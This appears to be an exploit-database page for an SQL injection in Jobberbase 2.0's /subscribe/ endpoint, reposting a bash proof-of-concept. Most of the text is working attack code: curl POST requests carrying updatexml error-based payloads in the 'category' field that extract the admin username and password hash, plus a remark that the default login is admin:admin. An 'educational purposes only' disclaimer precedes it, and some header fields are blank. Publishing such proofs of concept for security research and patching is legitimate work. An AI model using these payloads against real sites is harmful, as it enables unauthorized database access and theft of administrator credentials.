Jobberbase 2.0 subscribe sql injection Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2019-08-29 |
Type : webapps |
Platform : php
This exploit / vulnerability Jobberbase 2.0 subscribe sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Jobberbase 2.0 - 'subscribe' SQL injection
# Date: 29 August 2019
# Exploit Author: Damian Ebelties (
# Vendor Homepage:
# Version: 2.0
# Tested on: Ubuntu 18.04.1
: '
The page "/subscribe/" is vulnerable for SQL injection.
Simply make a POST request to /subscribe/ with the parameters:
- category=1337<inject_here>
You can use this script to verify if YOUR OWN instance is vulnerable.
$ bash http://localhost/jobberbase/
: 'Fetch the username'
USERNAME=$(curl -s "$1/subscribe/" \
-d "" \
-d "category=-1337 and updatexml(0,concat(0x0a,(select username from admin limit 0,1),0x0a),0)-- -" \
-d "" | head -n 3 | tail -n 1 | sed "s/'' in.*//")
: 'Ugly way to fetch the password hash'
PASS=$(curl -s "$1/subscribe/" \
-d "" \
-d "category=-1337 and updatexml(0,concat(0x0a,(select substring(password,1,16) from admin limit 0,1),0x0a),0)-- -" \
-d "" | head -n 3 | tail -n 1 | sed "s/'' in.*//")
WORD=$(curl -s "$1/subscribe/" \
-d "" \
-d "category=-1337 and updatexml(0,concat(0x0a,(select substring(password,17,16) from admin limit 0,1),0x0a),0)-- -" \
-d "" | head -n 3 | tail -n 1 | sed "s/'' in.*//")
: 'Print the user:hash (note: default login is admin:admin)'